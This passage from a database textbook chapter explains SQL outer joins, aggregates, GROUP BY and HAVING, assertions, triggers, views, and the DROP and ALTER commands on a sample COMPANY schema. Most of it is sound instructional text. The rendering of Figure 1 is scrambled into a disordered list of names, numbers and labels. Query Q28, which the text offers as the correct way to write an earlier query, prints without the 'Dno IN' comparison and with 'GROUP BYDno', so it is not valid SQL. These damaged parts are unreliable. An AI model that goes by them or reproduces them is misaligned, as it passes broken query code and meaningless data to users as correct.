FROM (EMPLOYEE NATURAL JOIN

(DEPARTMENT AS DEPT (Dname, Dno, Mssn, Msdate)))
WHERE Dname=‘Research’;

The default type of join in a joined table is called an inner join, where a tuple is
included in the result only if a matching tuple exists in the other relation. For exam-
ple, in query Q8A, only employees who have a supervisor are included in the result;
an EMPLOYEE tuple whose value for Super_ssn is NULL is excluded. If the user
requires that all employees be included, an OUTER JOIN must be used explicitly (see
Section 6.4.4 for the definition of OUTER JOIN). In SQL, this is handled by explicitly
specifying the keyword OUTER JOIN in a joined table, as illustrated in Q8B:

Q8B: SELECT E.Lname AS Employee_name,
S.Lname AS Supervisor_name

FROM (EMPLOYEE AS E LEFT OUTER JOIN EMPLOYEE AS S
ON E.Super_ssn=S.Ssn);

123

More SQL: Complex Queries, Triggers, Views, and Schema Modification

There are a variety of outer join operations, not detailed here. In SQL, the options
available for specifying joined tables include INNER JOIN (only pairs of tuples that
match the join condition are retrieved, same as JOIN), LEFT OUTER JOIN (every
tuple in the left table must appear in the result; if it does not have a matching tuple,
it is padded with NULL values for the attributes of the right table), RIGHT OUTER
JOIN (every tuple in the right table must appear in the result; if it does not have a
matching tuple, it is padded with NULL values for the attributes of the left table),
and FULL OUTER JOIN. In the latter three options, the keyword OUTER may be
omitted. If the join attributes have the same name, one can also specify the natural
join variation of outer joins by using the keyword NATURAL before the operation
(for example, NATURAL LEFT OUTER JOIN). The keyword CROSS JOIN is used to
specify the CARTESIAN PRODUCT operation, although this should be used only
with the utmost care because it generates all possible tuple combinations.

It is also possible to nest join specifications; that is, one of the tables in a join may
itself be a joined table. This allows the specification of the join of three or more
tables as a single joined table, which is called a multiway join. For example, Q2A is a
different way of specifying query Q2 from the chapter Basic SQL using the concept
of a joined table:

Q2A: SELECT Pnumber, Dnum, Lname, Address, Bdate
FROM ((PROJECT JOIN DEPARTMENT ON Dnum=Dnumber)

JOIN EMPLOYEE ON Mgr_ssn=Ssn)
WHERE Plocation=‘Stafford’;

Not all SQL implementations have implemented the new syntax of joined tables. In
some systems, a different syntax was used to specify outer joins by using the com-
parison operators +=, =+, and +=+ for left, right, and full outer join, respectively,
when specifying the join condition. For example, this syntax is available in Oracle.
To specify the left outer join in Q8B using this syntax, we could write the query Q8C
as follows:

Q8C: SELECT E.Lname, S.Lname
FROM EMPLOYEE E, EMPLOYEE S
WHERE E.Super_ssn += S.Ssn;

1.7 Aggregate Functions in SQL
Aggregate functions are used to summarize information from multiple tuples into
a single-tuple summary. Grouping is used to create subgroups of tuples before sum-
marization. Grouping and aggregation are required in many database applications,
and we will introduce their use in SQL through examples. A number of built-in
aggregate functions exist: COUNT, SUM, MAX, MIN, and AVG.2 The COUNT function
returns the number of tuples or values as specified in a query. The functions SUM,

2Additional aggregate functions for more advanced statistical calculation were added in SQL-99.

124

More SQL: Complex Queries, Triggers, Views, and Schema Modification

MAX, MIN, and AVG can be applied to a set or multiset of numeric values and return,
respectively, the sum, maximum value, minimum value, and average (mean) of
those values. These functions can be used in the SELECT clause or in a HAVING
clause (which we introduce later). The functions MAX and MIN can also be used with
attributes that have nonnumeric domains if the domain values have a total ordering
among one another.3 We illustrate the use of these functions with sample queries.

Query 19. Find the sum of the salaries of all employees, the maximum salary,
the minimum salary, and the average salary.

Q19: SELECT SUM (Salary), MAX (Salary), MIN (Salary), AVG (Salary)
FROM EMPLOYEE;

If we want to get the preceding function values for employees of a specific depart-
ment—say, the ‘Research’ department—we can write Query 20, where the
EMPLOYEE tuples are restricted by the WHERE clause to those employees who work
for the ‘Research’ department.

Query 20. Find the sum of the salaries of all employees of the ‘Research’
department, as well as the maximum salary, the minimum salary, and the aver-
age salary in this department.

Q20: SELECT SUM (Salary), MAX (Salary), MIN (Salary), AVG (Salary)
FROM (EMPLOYEE JOIN DEPARTMENT ON Dno=Dnumber)
WHERE Dname=‘Research’;

Queries 21 and 22. Retrieve the total number of employees in the company
(Q21) and the number of employees in the ‘Research’ department (Q22).

Q21: SELECT COUNT (*)
FROM EMPLOYEE;

Q22: SELECT COUNT (*)
FROM EMPLOYEE, DEPARTMENT
WHERE DNO=DNUMBER AND DNAME=‘Research’;

Here the asterisk (*) refers to the rows (tuples), so COUNT (*) returns the number of
rows in the result of the query. We may also use the COUNT function to count values
in a column rather than tuples, as in the next example.

Query 23. Count the number of distinct salary values in the database.

Q23: SELECT COUNT (DISTINCT Salary)
FROM EMPLOYEE;

If we write COUNT(SALARY) instead of COUNT(DISTINCT SALARY) in Q23, then
duplicate values will not be eliminated. However, any tuples with NULL for SALARY

3Total order means that for any two values in the domain, it can be determined that one appears before
the other in the defined order; for example, DATE, TIME, and TIMESTAMP domains have total orderings
on their values, as do alphabetic strings.

125

More SQL: Complex Queries, Triggers, Views, and Schema Modification

will not be counted. In general, NULL values are discarded when aggregate func-
tions are applied to a particular column (attribute).

The preceding examples summarize a whole relation (Q19, Q21, Q23) or a selected
subset of tuples (Q20, Q22), and hence all produce single tuples or single values.
They illustrate how functions are applied to retrieve a summary value or summary
tuple from the database. These functions can also be used in selection conditions
involving nested queries. We can specify a correlated nested query with an aggregate
function, and then use the nested query in the WHERE clause of an outer query. For
example, to retrieve the names of all employees who have two or more dependents
(Query 5), we can write the following:

Q5: SELECT Lname, Fname
FROM EMPLOYEE
WHERE ( SELECT COUNT (*)

FROM DEPENDENT
WHERE Ssn=Essn ) >= 2;

The correlated nested query counts the number of dependents that each employee
has; if this is greater than or equal to two, the employee tuple is selected.

1.8 Grouping: The GROUP BY and HAVING Clauses
In many cases we want to apply the aggregate functions to subgroups of tuples in a
relation, where the subgroups are based on some attribute values. For example, we
may want to find the average salary of employees in each department or the number
of employees who work on each project. In these cases we need to partition the rela-
tion into nonoverlapping subsets (or groups) of tuples. Each group (partition) will
consist of the tuples that have the same value of some attribute(s), called the
grouping attribute(s). We can then apply the function to each such group inde-
pendently to produce summary information about each group. SQL has a GROUP
BY clause for this purpose. The GROUP BY clause specifies the grouping attributes,
which should also appear in the SELECT clause, so that the value resulting from
applying each aggregate function to a group of tuples appears along with the value
of the grouping attribute(s).

Query 24. For each department, retrieve the department number, the number
of employees in the department, and their average salary.

Q24: SELECT Dno, COUNT (*), AVG (Salary)
FROM EMPLOYEE
GROUP BY Dno;

In Q24, the EMPLOYEE tuples are partitioned into groups—each group having
the same value for the grouping attribute Dno. Hence, each group contains the
employees who work in the same department. The COUNT and AVG functions are
applied to each such group of tuples. Notice that the SELECT clause includes only the
grouping attribute and the aggregate functions to be applied on each group of tuples.
Figure 1(a) illustrates how grouping works on Q24; it also shows the result of Q24.

126

More SQL: Complex Queries, Triggers, Views, and Schema Modification

Dno

5

4

1

4

3

1

33250

31000

55000

Count (*) Avg (Salary)

Result of Q24

Pname

ProductY

Computerization

Reorganization

Newbenefits

3

3

3

3

Count (*)

Result of Q26

These groups are not selected by
the HAVING condition of Q26.

Grouping EMPLOYEE tuples by the value of Dno

After applying the WHERE clause but before applying HAVING

After applying the HAVING clause condition

Fname

John

Franklin

Ramesh K

Jennifer

Alicia

Joyce A

Ahmad

James

V

E

T

B

J

S

Narayan

English

Jabbar
Bong

Smith

Wong

Zelaya

Wallace

666884444

453453453

987987987

888665555

123456789

333445555

999887777

987654321

Minit Lname

5

5

4

1

5

5

4

4

Dno

333445555

333445555

987654321

NULL

333445555

888665555

987654321

888665555

Super_ssn

38000

25000

25000

55000

30000

40000

25000

43000

Salary

. . .

Pname

ProductX

ProductX

ProductY

ProductZ
ProductY

ProductY

ProductZ

Computerization

Computerization

Computerization

Reorganization

Newbenefits

Reorganization
Reorganization

Newbenefits

Newbenefits

123456789

453453453

123456789

666884444
333445555

453453453

333445555

333445555

999887777

987987987

333445555

987987987

888665555

987654321

987654321

999887777

1

1

2
2

2
3

3

10

10

10

20

20
20

30

30

30

1

1

2
2

2
3

3

10

10

10

20
20

20

30

30

30

32.5

20.0

7.5
20.0

10.0
40.0

10.0

10.0

10.0

35.0

10.0
15.0

NULL

5.0

20.0

30.0

Pnumber Hours

. . .

Pname

ProductY

ProductY

ProductY

Computerization
Computerization

Computerization

Reorganization

Reorganization

Reorganization

Newbenefits

Newbenefits
Newbenefits

123456789

453453453

333445555

987987987
999887777

333445555

333445555

987654321

888665555

987987987

987654321
999887777

2

2

2
10

10
10

20

20

20

30

30
30

2

2

2
10

10
10

20

20

20

30

30
30

7.5

20.0

10.0
10.0

10.0
35.0

10.0

15.0

NULL

5.0

20.0
30.0

Pnumber Essn Pno Hours

. . .
(Pnumber not shown)

Ssn . . .(a)

(b) PnoEssn. . .

. . .

Figure 1
Results of GROUP BY and HAVING. (a) Q24. (b) Q26.

127

More SQL: Complex Queries, Triggers, Views, and Schema Modification

If NULLs exist in the grouping attribute, then a separate group is created for all
tuples with a NULL value in the grouping attribute. For example, if the EMPLOYEE
table had some tuples that had NULL for the grouping attribute Dno, there would be
a separate group for those tuples in the result of Q24.

Query 25. For each project, retrieve the project number, the project name, and
the number of employees who work on that project.

Q25: SELECT Pnumber, Pname, COUNT (*)
FROM PROJECT, WORKS_ON
WHERE Pnumber=Pno
GROUP BY Pnumber, Pname;

Q25 shows how we can use a join condition in conjunction with GROUP BY. In this
case, the grouping and functions are applied after the joining of the two relations.
Sometimes we want to retrieve the values of these functions only for groups that sat-
isfy certain conditions. For example, suppose that we want to modify Query 25 so
that only projects with more than two employees appear in the result. SQL provides
a HAVING clause, which can appear in conjunction with a GROUP BY clause, for this
purpose. HAVING provides a condition on the summary information regarding the
group of tuples associated with each value of the grouping attributes. Only the
groups that satisfy the condition are retrieved in the result of the query. This is illus-
trated by Query 26.

Query 26. For each project on which more than two employees work, retrieve
the project number, the project name, and the number of employees who work
on the project.

Q26: SELECT Pnumber, Pname, COUNT (*)
FROM PROJECT, WORKS_ON
WHERE Pnumber=Pno
GROUP BY Pnumber, Pname
HAVING COUNT (*) > 2;

Notice that while selection conditions in the WHERE clause limit the tuples to which
functions are applied, the HAVING clause serves to choose whole groups. Figure 1(b)
illustrates the use of HAVING and displays the result of Q26.

Query 27. For each project, retrieve the project number, the project name, and
the number of employees from department 5 who work on the project.

Q27: SELECT Pnumber, Pname, COUNT (*)
FROM PROJECT, WORKS_ON, EMPLOYEE
WHERE Pnumber=Pno AND Ssn=Essn AND Dno=5
GROUP BY Pnumber, Pname;

Here we restrict the tuples in the relation (and hence the tuples in each group) to
those that satisfy the condition specified in the WHERE clause—namely, that they
work in department number 5. Notice that we must be extra careful when two dif-
ferent conditions apply (one to the aggregate function in the SELECT clause and
another to the function in the HAVING clause). For example, suppose that we want

128

More SQL: Complex Queries, Triggers, Views, and Schema Modification

to count the total number of employees whose salaries exceed $40,000 in each
department, but only for departments where more than five employees work. Here,
the condition (SALARY > 40000) applies only to the COUNT function in the SELECT
clause. Suppose that we write the following incorrect query:

SELECT Dname, COUNT (*)
FROM DEPARTMENT, EMPLOYEE
WHERE Dnumber=Dno AND Salary>40000
GROUP BY Dname
HAVING COUNT (*) > 5;

This is incorrect because it will select only departments that have more than five
employees who each earn more than $40,000. The rule is that the WHERE clause is
executed first, to select individual tuples or joined tuples; the HAVING clause is
applied later, to select individual groups of tuples. Hence, the tuples are already
restricted to employees who earn more than $40,000 before the function in the
HAVING clause is applied. One way to write this query correctly is to use a nested
query, as shown in Query 28.

Query 28. For each department that has more than five employees, retrieve
the department number and the number of its employees who are making
more than $40,000.

Q28: SELECT Dnumber, COUNT (*)
FROM DEPARTMENT, EMPLOYEE
WHERE Dnumber=Dno AND Salary>40000 AND

( SELECT Dno
FROM EMPLOYEE
GROUP BYDno
HAVING COUNT (*) > 5)

1.9 Discussion and Summary of SQL Queries
A retrieval query in SQL can consist of up to six clauses, but only the first two—
SELECT and FROM—are mandatory. The query can span several lines, and is ended
by a semicolon. Query terms are separated by spaces, and parentheses can be used to
group relevant parts of a query in the standard way. The clauses are specified in the
following order, with the clauses between square brackets [ … ] being optional:

SELECT
FROM

[ WHERE ]
[ GROUP BY ]
[ HAVING ]
[ ORDER BY ];

The SELECT clause lists the attributes or functions to be retrieved. The FROM clause
specifies all relations (tables) needed in the query, including joined relations, but
not those in nested queries. The WHERE clause specifies the conditions for selecting
the tuples from these relations, including join conditions if needed. GROUP BY

129

More SQL: Complex Queries, Triggers, Views, and Schema Modification

specifies grouping attributes, whereas HAVING specifies a condition on the groups
being selected rather than on the individual tuples. The built-in aggregate functions
COUNT, SUM, MIN, MAX, and AVG are used in conjunction with grouping, but they
can also be applied to all the selected tuples in a query without a GROUP BY clause.
Finally, ORDER BY specifies an order for displaying the result of a query.

In order to formulate queries correctly, it is useful to consider the steps that define
the meaning or semantics of each query. A query is evaluated conceptually4 by first
applying the FROM clause (to identify all tables involved in the query or to material-
ize any joined tables), followed by the WHERE clause to select and join tuples, and
then by GROUP BY and HAVING. Conceptually, ORDER BY is applied at the end to
sort the query result. If none of the last three clauses (GROUP BY, HAVING, and
ORDER BY) are specified, we can think conceptually of a query as being executed as
follows: For each combination of tuples—one from each of the relations specified in
the FROM clause—evaluate the WHERE clause; if it evaluates to TRUE, place the val-
ues of the attributes specified in the SELECT clause from this tuple combination in
the result of the query. Of course, this is not an efficient way to implement the query
in a real system, and each DBMS has special query optimization routines to decide
on an execution plan that is efficient to execute.

In general, there are numerous ways to specify the same query in SQL. This flexibil-
ity in specifying queries has advantages and disadvantages. The main advantage is
that users can choose the technique with which they are most comfortable when
specifying a query. For example, many queries may be specified with join conditions
in the WHERE clause, or by using joined relations in the FROM clause, or with some
form of nested queries and the IN comparison operator. Some users may be more
comfortable with one approach, whereas others may be more comfortable with
another. From the programmer’s and the system’s point of view regarding query
optimization, it is generally preferable to write a query with as little nesting and
implied ordering as possible.

The disadvantage of having numerous ways of specifying the same query is that this
may confuse the user, who may not know which technique to use to specify particu-
lar types of queries. Another problem is that it may be more efficient to execute a
query specified in one way than the same query specified in an alternative way.
Ideally, this should not be the case: The DBMS should process the same query in the
same way regardless of how the query is specified. But this is quite difficult in prac-
tice, since each DBMS has different methods for processing queries specified in dif-
ferent ways. Thus, an additional burden on the user is to determine which of the
alternative specifications is the most efficient to execute. Ideally, the user should
worry only about specifying the query correctly, whereas the DBMS would deter-
mine how to execute the query efficiently. In practice, however, it helps if the user is
aware of which types of constructs in a query are more expensive to process than
others.

4The actual order of query evaluation is implementation dependent; this is just a way to conceptually view
a query in order to correctly formulate it.

130

More SQL: Complex Queries, Triggers, Views, and Schema Modification

2 Specifying Constraints as Assertions
and Actions as Triggers

In this section, we introduce two additional features of SQL: the CREATE ASSER-
TION statement and the CREATE TRIGGER statement. Section 2.1 discusses CREATE
ASSERTION, which can be used to specify additional types of constraints that are
outside the scope of the built-in relational model constraints (primary and unique
keys, entity integrity, and referential integrity). These built-in constraints can be
specified within the CREATE TABLE statement of SQL.

Then in Section 2.2 we introduce CREATE TRIGGER, which can be used to specify
automatic actions that the database system will perform when certain events and
conditions occur. This type of functionality is generally referred to as active data-
bases. We only introduce the basics of triggers in this chapter.

2.1 Specifying General Constraints as Assertions in SQL
In SQL, users can specify general constraints via declarative assertions, using the
CREATE ASSERTION statement of the DDL. Each assertion is given a constraint
name and is specified via a condition similar to the WHERE clause of an SQL query.
For example, to specify the constraint that the salary of an employee must not be
greater than the salary of the manager of the department that the employee works for in
SQL, we can write the following assertion:

CREATE ASSERTION SALARY_CONSTRAINT
CHECK ( NOT EXISTS ( SELECT *

FROM EMPLOYEE E, EMPLOYEE M,
DEPARTMENT D

WHERE E.Salary>M.Salary
AND E.Dno=D.Dnumber
AND D.Mgr_ssn=M.Ssn ) );

The constraint name SALARY_CONSTRAINT is followed by the keyword CHECK,
which is followed by a condition in parentheses that must hold true on every data-
base state for the assertion to be satisfied. The constraint name can be used later to
refer to the constraint or to modify or drop it. The DBMS is responsible for ensur-
ing that the condition is not violated. Any WHERE clause condition can be used, but
many constraints can be specified using the EXISTS and NOT EXISTS style of SQL
conditions. Whenever some tuples in the database cause the condition of an
ASSERTION statement to evaluate to FALSE, the constraint is violated. The con-
straint is satisfied by a database state if no combination of tuples in that database
state violates the constraint.

The basic technique for writing such assertions is to specify a query that selects any
tuples that violate the desired condition. By including this query inside a NOT EXISTS

131

More SQL: Complex Queries, Triggers, Views, and Schema Modification

clause, the assertion will specify that the result of this query must be empty so that
the condition will always be TRUE. Thus, the assertion is violated if the result of the
query is not empty. In the preceding example, the query selects all employees whose
salaries are greater than the salary of the manager of their department. If the result
of the query is not empty, the assertion is violated.

Note that the CHECK clause and constraint condition can also be used to specify
constraints on individual attributes and domains and on individual tuples. A major
difference between CREATE ASSERTION and the individual domain constraints and
tuple constraints is that the CHECK clauses on individual attributes, domains, and
tuples are checked in SQL only when tuples are inserted or updated. Hence, con-
straint checking can be implemented more efficiently by the DBMS in these cases.
The schema designer should use CHECK on attributes, domains, and tuples only
when he or she is sure that the constraint can only be violated by insertion or updat-
ing of tuples. On the other hand, the schema designer should use CREATE ASSER-
TION only in cases where it is not possible to use CHECK on attributes, domains, or
tuples, so that simple checks are implemented more efficiently by the DBMS.

2.2 Introduction to Triggers in SQL
Another important statement in SQL is CREATE TRIGGER. In many cases it is con-
venient to specify the type of action to be taken when certain events occur and when
certain conditions are satisfied. For example, it may be useful to specify a condition
that, if violated, causes some user to be informed of the violation. A manager may
want to be informed if an employee’s travel expenses exceed a certain limit by
receiving a message whenever this occurs. The action that the DBMS must take in
this case is to send an appropriate message to that user. The condition is thus used to
monitor the database. Other actions may be specified, such as executing a specific
stored procedure or triggering other updates. The CREATE TRIGGER statement is
used to implement such actions in SQL. Here we just give a simple example of how
triggers may be used.

Suppose we want to check whenever an employee’s salary is greater than the salary
of his or her direct supervisor in the COMPANY database (see Figures A.1 and A.2 in
Appendix: Figures at the end of the chapter). Several events can trigger this rule:
inserting a new employee record, changing an employee’s salary, or changing an
employee’s supervisor. Suppose that the action to take would be to call an external
stored procedure SALARY_VIOLATION,5 which will notify the supervisor. The trigger
could then be written as in R5 below. Here we are using the syntax of the Oracle
database system.

R5: CREATE TRIGGER SALARY_VIOLATION
BEFORE INSERT OR UPDATE OF SALARY, SUPERVISOR_SSN

ON EMPLOYEE

5Assuming that an appropriate external procedure has been declared.

132

More SQL: Complex Queries, Triggers, Views, and Schema Modification

FOR EACH ROW
WHEN ( NEW.SALARY > ( SELECT SALARY FROM EMPLOYEE

WHERE SSN = NEW.SUPERVISOR_SSN ) )
INFORM_SUPERVISOR(NEW.Supervisor_ssn,
NEW.Ssn );

The trigger is given the name SALARY_VIOLATION, which can be used to remove or
deactivate the trigger later. A typical trigger has three components:

1. The event(s): These are usually database update operations that are explicitly
applied to the database. In this example the events are: inserting a new
employee record, changing an employee’s salary, or changing an employee’s
supervisor. The person who writes the trigger must make sure that all possi-
ble events are accounted for. In some cases, it may be necessary to write more
than one trigger to cover all possible cases. These events are specified after
the keyword BEFORE in our example, which means that the trigger should
be executed before the triggering operation is executed. An alternative is to
use the keyword AFTER, which specifies that the trigger should be executed
after the operation specified in the event is completed.

2. The condition that determines whether the rule action should be executed:
Once the triggering event has occurred, an optional condition may be evalu-
ated. If no condition is specified, the action will be executed once the event
occurs. If a condition is specified, it is first evaluated, and only if it evaluates
to true will the rule action be executed. The condition is specified in the
WHEN clause of the trigger.

3. The action to be taken: The action is usually a sequence of SQL statements,
but it could also be a database transaction or an external program that will
be automatically executed. In this example, the action is to execute the stored
procedure INFORM_SUPERVISOR.

Triggers can be used in various applications, such as maintaining database consis-
tency, monitoring database updates, and updating derived data automatically.

3 Views (Virtual Tables) in SQL
In this section we introduce the concept of a view in SQL. We show how views are
specified, and then we discuss the problem of updating views and how views can be
implemented by the DBMS.

3.1 Concept of a View in SQL
A view in SQL terminology is a single table that is derived from other tables.6 These
other tables can be base tables or previously defined views. A view does not necessarily

6As used in SQL, the term view is more limited than the term user view, since a user view would possibly
include many relations.

133

More SQL: Complex Queries, Triggers, Views, and Schema Modification

DEPT_INFO

Dept_name No_of_emps Total_sal

WORKS_ON1

Fname Lname Pname Hours

Figure 2
Two views specified on
the database schema of
Figure A.1.

exist in physical form; it is considered to be a virtual table, in contrast to base tables,
whose tuples are always physically stored in the database. This limits the possible
update operations that can be applied to views, but it does not provide any limitations
on querying a view.

We can think of a view as a way of specifying a table that we need to reference fre-
quently, even though it may not exist physically. For example, referring to the
COMPANY database in Figure A.1 we may frequently issue queries that retrieve the
employee name and the project names that the employee works on. Rather than
having to specify the join of the three tables EMPLOYEE, WORKS_ON, and PROJECT
every time we issue this query, we can define a view that is specified as the result of
these joins. Then we can issue queries on the view, which are specified as single-
table retrievals rather than as retrievals involving two joins on three tables. We call
the EMPLOYEE, WORKS_ON, and PROJECT tables the defining tables of the view.

3.2 Specification of Views in SQL
In SQL, the command to specify a view is CREATE VIEW. The view is given a (vir-
tual) table name (or view name), a list of attribute names, and a query to specify the
contents of the view. If none of the view attributes results from applying functions
or arithmetic operations, we do not have to specify new attribute names for the
view, since they would be the same as the names of the attributes of the defining
tables in the default case. The views in V1 and V2 create virtual tables whose schemas
are illustrated in Figure 2 when applied to the database schema of Figure A.1.

V1: CREATE VIEW WORKS_ON1
AS SELECT Fname, Lname, Pname, Hours

FROM EMPLOYEE, PROJECT, WORKS_ON
WHERE Ssn=Essn AND Pno=Pnumber;

V2: CREATE VIEW DEPT_INFO(Dept_name, No_of_emps, Total_sal)
AS SELECT Dname, COUNT (*), SUM (Salary)

FROM DEPARTMENT, EMPLOYEE
WHERE Dnumber=Dno
GROUP BY Dname;

In V1, we did not specify any new attribute names for the view WORKS_ON1
(although we could have); in this case, WORKS_ON1 inherits the names of the view
attributes from the defining tables EMPLOYEE, PROJECT, and WORKS_ON. View V2

134

More SQL: Complex Queries, Triggers, Views, and Schema Modification

explicitly specifies new attribute names for the view DEPT_INFO, using a one-to-one
correspondence between the attributes specified in the CREATE VIEW clause and
those specified in the SELECT clause of the query that defines the view.

We can now specify SQL queries on a view—or virtual table—in the same way we
specify queries involving base tables. For example, to retrieve the last name and first
name of all employees who work on the ‘ProductX’ project, we can utilize the
WORKS_ON1 view and specify the query as in QV1:

QV1: SELECT Fname, Lname
FROM WORKS_ON1
WHERE Pname=‘ProductX’;

The same query would require the specification of two joins if specified on the
base relations directly; one of the main advantages of a view is to simplify the spec-
ification of certain queries. Views are also used as a security and authorization
mechanism.

A view is supposed to be always up-to-date; if we modify the tuples in the base tables
on which the view is defined, the view must automatically reflect these changes.
Hence, the view is not realized or materialized at the time of view definition but
rather at the time when we specify a query on the view. It is the responsibility of the
DBMS and not the user to make sure that the view is kept up-to-date. We will discuss
various ways the DBMS can apply to keep a view up-to-date in the next subsection.

If we do not need a view any more, we can use the DROP VIEW command to dispose
of it. For example, to get rid of the view V1, we can use the SQL statement in V1A:

V1A: DROP VIEW WORKS_ON1;

3.3 View Implementation, View Update,
and Inline Views

The problem of efficiently implementing a view for querying is complex. Two main
approaches have been suggested. One strategy, called query modification, involves
modifying or transforming the view query (submitted by the user) into a query on
the underlying base tables. For example, the query QV1 would be automatically
modified to the following query by the DBMS:

SELECT Fname, Lname
FROM EMPLOYEE, PROJECT, WORKS_ON
WHERE Ssn=Essn AND Pno=Pnumber

AND Pname=‘ProductX’;

The disadvantage of this approach is that it is inefficient for views defined via com-
plex queries that are time-consuming to execute, especially if multiple queries are
going to be applied to the same view within a short period of time. The second
strategy, called view materialization, involves physically creating a temporary view
table when the view is first queried and keeping that table on the assumption that

135

More SQL: Complex Queries, Triggers, Views, and Schema Modification

other queries on the view will follow. In this case, an efficient strategy for automati-
cally updating the view table when the base tables are updated must be developed in
order to keep the view up-to-date. Techniques using the concept of incremental
update have been developed for this purpose, where the DBMS can determine what
new tuples must be inserted, deleted, or modified in a materialized view table when
a database update is applied to one of the defining base tables. The view is generally
kept as a materialized (physically stored) table as long as it is being queried. If the
view is not queried for a certain period of time, the system may then automatically
remove the physical table and recompute it from scratch when future queries refer-
ence the view.

Updating of views is complicated and can be ambiguous. In general, an update on a
view defined on a single table without any aggregate functions can be mapped to an
update on the underlying base table under certain conditions. For a view involving
joins, an update operation may be mapped to update operations on the underlying
base relations in multiple ways. Hence, it is often not possible for the DBMS to
determine which of the updates is intended. To illustrate potential problems with
updating a view defined on multiple tables, consider the WORKS_ON1 view, and
suppose that we issue the command to update the PNAME attribute of ‘John Smith’
from ‘ProductX’ to ‘ProductY’. This view update is shown in UV1:

UV1: UPDATE WORKS_ON1
SET Pname = ‘ProductY’
WHERE Lname=‘Smith’ AND Fname=‘John’

AND Pname=‘ProductX’;

This query can be mapped into several updates on the base relations to give the
desired update effect on the view. In addition, some of these updates will create
additional side effects that affect the result of other queries. For example, here are
two possible updates, (a) and (b), on the base relations corresponding to the view
update operation in UV1:

(a): UPDATE WORKS_ON
SET Pno = ( SELECT Pnumber

FROM PROJECT
WHERE Pname=‘ProductY’ )

WHERE Essn IN ( SELECT Ssn
FROM EMPLOYEE
WHERE Lname=‘Smith’ AND Fname=‘John’ )

AND
Pno = ( SELECT Pnumber

FROM PROJECT
WHERE Pname=‘ProductX’ );

(b): UPDATE PROJECT SET Pname = ‘ProductY’
WHERE Pname = ‘ProductX’;

Update (a) relates ‘John Smith’ to the ‘ProductY’ PROJECT tuple instead of the
‘ProductX’ PROJECT tuple and is the most likely desired update. However, (b)

136

More SQL: Complex Queries, Triggers, Views, and Schema Modification

would also give the desired update effect on the view, but it accomplishes this by
changing the name of the ‘ProductX’ tuple in the PROJECT relation to ‘ProductY’. It
is quite unlikely that the user who specified the view update UV1 wants the update
to be interpreted as in (b), since it also has the side effect of changing all the view
tuples with Pname = ‘ProductX’.

Some view updates may not make much sense; for example, modifying the Total_sal
attribute of the DEPT_INFO view does not make sense because Total_sal is defined to
be the sum of the individual employee salaries. This request is shown as UV2:

UV2: UPDATE DEPT_INFO
SET Total_sal=100000
WHERE Dname=‘Research’;

A large number of updates on the underlying base relations can satisfy this view
update.

Generally, a view update is feasible when only one possible update on the base rela-
tions can accomplish the desired update effect on the view. Whenever an update on
the view can be mapped to more than one update on the underlying base relations,
we must have a certain procedure for choosing one of the possible updates as the
most likely one. Some researchers have developed methods for choosing the most
likely update, while other researchers prefer to have the user choose the desired
update mapping during view definition.

In summary, we can make the following observations:

■ A view with a single defining table is updatable if the view attributes contain
the primary key of the base relation, as well as all attributes with the NOT
NULL constraint that do not have default values specified.

■ Views defined on multiple tables using joins are generally not updatable.

■ Views defined using grouping and aggregate functions are not updatable.

In SQL, the clause WITH CHECK OPTION must be added at the end of the view defi-
nition if a view is to be updated. This allows the system to check for view updatabil-
ity and to plan an execution strategy for view updates.

It is also possible to define a view table in the FROM clause of an SQL query. This is
known as an in-line view. In this case, the view is defined within the query itself.

4 Schema Change Statements in SQL
In this section, we give an overview of the schema evolution commands available in
SQL, which can be used to alter a schema by adding or dropping tables, attributes,
constraints, and other schema elements. This can be done while the database is
operational and does not require recompilation of the database schema. Certain
checks must be done by the DBMS to ensure that the changes do not affect the rest
of the database and make it inconsistent.

137

More SQL: Complex Queries, Triggers, Views, and Schema Modification

4.1 The DROP Command
The DROP command can be used to drop named schema elements, such as tables,
domains, or constraints. One can also drop a schema. For example, if a whole
schema is no longer needed, the DROP SCHEMA command can be used. There are
two drop behavior options: CASCADE and RESTRICT. For example, to remove the
COMPANY database schema and all its tables, domains, and other elements, the
CASCADE option is used as follows:

DROP SCHEMA COMPANY CASCADE;

If the RESTRICT option is chosen in place of CASCADE, the schema is dropped only
if it has no elements in it; otherwise, the DROP command will not be executed. To
use the RESTRICT option, the user must first individually drop each element in the
schema, then drop the schema itself.

If a base relation within a schema is no longer needed, the relation and its definition
can be deleted by using the DROP TABLE command. For example, if we no longer
wish to keep track of dependents of employees in the COMPANY database of Figure
A.3, we can get rid of the DEPENDENT relation by issuing the following command:

DROP TABLE DEPENDENT CASCADE;

If the RESTRICT option is chosen instead of CASCADE, a table is dropped only if it
is not referenced in any constraints (for example, by foreign key definitions in
another relation) or views (see Section 3) or by any other elements. With the
CASCADE option, all such constraints, views, and other elements that reference the
table being dropped are also dropped automatically from the schema, along with
the table itself.

Notice that the DROP TABLE command not only deletes all the records in the table if
successful, but also removes the table definition from the catalog. If it is desired to
delete only the records but to leave the table definition for future use, then the
DELETE command should be used instead of DROP TABLE.

The DROP command can also be used to drop other types of named schema ele-
ments, such as constraints or domains.

4.2 The ALTER Command
The definition of a base table or of other named schema elements can be changed by
using the ALTER command. For base tables, the possible alter table actions include
adding or dropping a column (attribute), changing a column definition, and adding
or dropping table constraints. For example, to add an attribute for keeping track of
jobs of employees to the EMPLOYEE base relation in the COMPANY schema (see
Figure A.3), we can use the command

ALTER TABLE COMPANY.EMPLOYEE ADD COLUMN Job VARCHAR(12);

We must still enter a value for the new attribute Job for each individual EMPLOYEE
tuple. This can be done either by specifying a default clause or by using the UPDATE

138

More SQL: Complex Queries, Triggers, Views, and Schema Modification

command individually on each tuple. If no default clause is specified, the new
attribute will have NULLs in all the tuples of the relation immediately after the com-
mand is executed; hence, the NOT NULL constraint is not allowed in this case.

To drop a column, we must choose either CASCADE or RESTRICT for drop behav-
ior. If CASCADE is chosen, all constraints and views that reference the column are
dropped automatically from the schema, along with the column. If RESTRICT is
chosen, the command is successful only if no views or constraints (or other schema
elements) reference the column. For example, the following command removes the
attribute Address from the EMPLOYEE base table:

ALTER TABLE COMPANY.EMPLOYEE DROP COLUMN Address CASCADE;

It is also possible to alter a column definition by dropping an existing default clause
or by defining a new default clause. The following examples illustrate this clause:

ALTER TABLE COMPANY.DEPARTMENT ALTER COLUMN Mgr_ssn
DROP DEFAULT;

ALTER TABLE COMPANY.DEPARTMENT ALTER COLUMN Mgr_ssn
SET DEFAULT ‘333445555’;

One can also change the constraints specified on a table by adding or dropping a
named constraint. To be dropped, a constraint must have been given a name when
it was specified. For example, to drop the constraint named EMPSUPERFK in Figure
